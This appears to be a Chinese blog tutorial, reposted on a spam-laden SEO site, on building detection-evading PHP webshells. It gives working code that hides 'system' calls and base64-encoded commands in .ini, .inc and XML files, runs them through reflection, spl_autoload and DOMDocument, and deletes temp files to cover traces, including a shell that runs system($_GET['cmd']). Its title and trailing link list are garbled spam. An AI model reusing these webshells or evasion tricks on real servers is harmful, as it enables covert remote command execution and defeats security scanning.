当前位置: 首页 > wzjs >正文

香港疫情最新消息实时seo关键词排名优化app

香港疫情最新消息实时,seo关键词排名优化app,深圳市龙岗区住房和建设局官方网站,网站开发模型工具前言 PHP 作为广泛使用的服务端语言,其灵活的内置类(如 DOMDocument)和文件操作机制(.ini、.inc 的自动加载),为攻击者提供了天然的隐蔽通道。通过 动态函数拼接、反射调用、加密混淆 和 伪命名空间 等手法…

前言

PHP 作为广泛使用的服务端语言,其灵活的内置类(如 DOMDocument)和文件操作机制(.ini.inc 的自动加载),为攻击者提供了天然的隐蔽通道。通过 动态函数拼接反射调用加密混淆伪命名空间 等手法,恶意代码得以“寄生”于正常的业务逻辑中,甚至借助析构函数、自动加载等机制实现 无文件化触发。这种“隐写术”般的攻击方式,不仅挑战了传统检测技术的边界,也对开发者和安全团队提出了更高维度的防御要求。

本文将以 PHP 内置类与文件操作 为核心,深度剖析攻击者如何将 XML 解析、配置加载、自动包含等“合法”功能武器化,构建出零特征、高动态的免杀 WebShell。

利用parse_ini_file函数

PHP中有一个名为parse_ini_file的函数,用于解析.ini文件 , 如果Webshell的代码隐藏在.ini文件的某些配置项中,然后通过解析这些配置项来动态执行代码。

动态函数调用 + 反射执行

创建一个.ini文件,其中包含恶意代码的字符串

// [payload]
// func_name = "system"
// encoded_cmd = "d2hvYW1p"  // base64("whoami")

代码:

class ConfigLoader {private $config;public function __construct($file) {$this->config = parse_ini_file($file, true); // 解析 .ini 文件$this->execute();}private function execute() {$func = $this->config['payload']['func_name'];$cmd = base64_decode($this->config['payload']['encoded_cmd']);// 使用反射动态调用函数$reflection = new ReflectionFunction($func);$reflection->invoke($cmd);}
}new ConfigLoader('config.ini'); // 触发执行
  • 敏感函数名(system)和指令(whoami)均存储在 .ini 文件中,避免代码硬编码。
  • 使用 反射(ReflectionFunction) 间接调用函数,绕过静态检测。
临时文件写入 + 包含执行

.ini文件

[payload]
encoded_code = "PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4="
<?
class TempFileExecutor {private $code;public function __construct($iniFile) {$config = parse_ini_file($iniFile);$this->code = base64_decode($config['encoded_code']);$this->run();}private function run() {$tempFile = tempnam(sys_get_temp_dir(), 'tmp_');file_put_contents($tempFile, $this->code);include $tempFile;    // 包含临时文件执行代码unlink($tempFile);    // 清理痕迹}
}new TempFileExecutor('evil.ini');

利用spl_autoload 函数

函数定义
spl_autoload(string $class_name, string $file_extensions = null): void
  • 参数

  • $class_name:需要加载的类名。

  • $file_extensions(可选):指定文件扩展名(如 .php,.inc),默认使用 include_path 中的配置。

行为逻辑
  1. 将类名 $class_name 转换为小写(若系统区分大小写则保留原大小写)。
  2. $file_extensions 指定的扩展名,在 include_path 目录下查找文件。
  3. 找到文件后自动包含(include_once)该文件。

1.inc文件

<?php system("whoami"); ?>

1.php

<?php spl_autoload("1"); ?>
  1. spl_autoload("1") 尝试加载类名为 nb 的文件。
  2. 按默认规则查找 nb.php1.inc,发现 1.inc 存在。
  3. 包含 1.inc 并执行 webshell,输出服务器配置信息。

关键点

  • spl_autoload 不仅用于加载类,直接调用时也可触发文件包含
  • 文件扩展名(.inc)和类名(1)需匹配,但文件内容无需严格包含类定义。
伪装类文件 + 动态执行

payload.inc

<?php
class Payload { // 伪装成合法类public static function run() {system($_GET['cmd']); // 恶意代码}
}

1.php

<?php
spl_autoload("payload"); // 加载 Payload 类
if (class_exists('Payload')) {Payload::run(); // 触发恶意代码
}

利用DOMDocument类

DOMDocument 是 PHP 中用于处理 XMLHTML 文档的核心类。它基于 W3C 的 DOM(Document Object Model)标准,提供了一套完整的 API,允许开发者以树形结构操作文档节点(如元素、属性、文本等)。,支持XPath查询和动态节点解析 (php版本>8.0)

常用方法

方法名功能说明示例
createElement($name, $value)创建元素节点$element = $dom->createElement('tag', 'content')
createAttribute($name)创建属性节点$attr = $dom->createAttribute('id')
getElementsByTagName($name)通过标签名获取节点列表$items = $dom->getElementsByTagName('item')
getElementById($id)通过 ID 获取单个元素(需 DTD 验证)$node = $dom->getElementById('main')
saveHTML()输出 HTML 格式字符串(处理 HTML 文档时)$html = $dom->saveHTML()
validate()验证文档是否符合 DTD/XSDif ($dom->validate()) { ... }

解析 XML 数据

<?php
$xml = <<<XML
<?xml version="1.0"?>
<books><book id="1"><title>PHP Basics</title><author>John Doe</author></book>
</books>
XML;$dom = new DOMDocument();
$dom->loadXML($xml);// 遍历所有 <book> 节点
foreach ($dom->getElementsByTagName('book') as $book) {$title = $book->getElementsByTagName('title')->item(0)->nodeValue;$author = $book->getElementsByTagName('author')->item(0)->nodeValue;echo "Title: $title, Author: $author\n";
}

输出:

这里我们可以提取xml里面各节点的内容,这样的话,我们就可以把恶意字符串隐藏在xml文件里面

<?php
// 恶意 XML 数据(可远程加载或硬编码)
$xml = <<<XML
<root><data>whoami</data>
</root>
XML;$doc = new DOMDocument();
$doc->loadXML($xml);  // 解析 XML
$xpath = new DOMXPath($doc);
$node = $xpath->query('//data')->item(0); // 提取节点值// 动态调用高危函数(避免直接写 system)
$func = 'sys' . 'tem';
$func($node->nodeValue);  // 执行系统命令
?>

将恶意字符串完全隐藏在 XML 文件中

1.xml

<?xml version="1.0" encoding="UTF-8"?>
<config><!-- 函数名分块存储 --><function><part>sys</part><part>tem</part></function><!-- 参数使用 Base64 编码 --><data>d2hvYW1p</data> <!-- Base64("whoami") -->
</config>

1.php

<?php
// 加载外部 XML 文件(可替换为远程 URL)
$xml = file_get_contents('malicious.xml');// 解析 XML
$doc = new DOMDocument();
$doc->loadXML($xml);
$xpath = new DOMXPath($doc);// 提取分块函数名并拼接
$funcParts = $xpath->query('//function/part');
$func = '';
foreach ($funcParts as $part) {$func .= $part->nodeValue; // 拼接为 "system"
}// 提取并解码参数
$dataNode = $xpath->query('//data')->item(0);
$arg = base64_decode($dataNode->nodeValue); // 解码为 "whoami"// 动态调用(增加安全验证)
if ($func && $arg && function_exists($func)) {($func)($arg); // 执行 system("whoami")
} else {error_log("配置错误或函数不可用"); // 伪装成普通错误日志
}
?>

http://www.dtcms.com/wzjs/256442.html

相关文章:

  • 安阳360网站推广工具广州seo工作
  • 西安网站建设运维网络销售好不好做
  • 代做毕业设计找哪个网站好关键词竞价排名
  • 网站开发哪好网络营销公司是做什么的
  • 购物网站建设网站百度账号注册申请
  • 做公众号关注网站哈尔滨优化网站方法
  • 网站模版的软件网站的营销策略
  • 灯具网站模板网络网站推广
  • wordpress主题c7v5 v2.0广州搜索seo网站优化
  • 四川建设行业数据共享平台的网站最好用的搜索神器
  • 南通外贸网站推广网站怎么搭建
  • 网站统计模块网络平台营销
  • 做西点网站怎么免费建个人网站
  • 网站开发外包维护合同百度本地推广
  • 网站验证码调用百度网盘资源搜索
  • asp.net怎么做网站软文是什么意思
  • 温州网站建设方案推广个人网页制作成品
  • 重庆建设监理协会网站seo服务深圳
  • 天河外贸网站建设深圳百度推广开户
  • 医院网站站内文章收录量多少seo外包优化服务商
  • 动态网站开发设计思路如何制作网页教程
  • 天涯论坛网站建设seo推广代理
  • seo中文杭州网站推广优化
  • 学校开发网站公司免费引流在线推广
  • 新手织梦网建设网站大地seo视频
  • 网站后台管理模板psd网络推广员上班靠谱吗
  • 做报纸版式的网站全搜网
  • 网站 建设实验小结营销培训讲师
  • 如何做微信网站百度快照关键词推广
  • 中国优秀设计网站有哪些内容搜狗搜索网